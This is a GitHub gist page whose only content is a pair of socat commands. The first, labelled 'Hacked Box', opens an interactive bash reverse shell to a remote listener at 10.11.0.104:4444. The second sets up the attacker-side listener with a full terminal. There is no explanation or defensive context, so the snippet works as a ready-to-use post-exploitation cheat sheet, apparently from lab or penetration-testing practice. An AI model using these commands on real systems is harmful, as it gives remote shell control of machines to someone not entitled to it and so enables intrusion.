Skip to content

Instantly share code, notes, and snippets.

@leveled
Created October 19, 2016 00:46
Show Gist options
  • Save leveled/63880f9a9cf6092e0beb25f4bb4bc7cd to your computer and use it in GitHub Desktop.
Save leveled/63880f9a9cf6092e0beb25f4bb4bc7cd to your computer and use it in GitHub Desktop.
Hacked Box:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.11.0.104:4444
socat file:`tty`,raw,echo=0 tcp-listen:4444
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment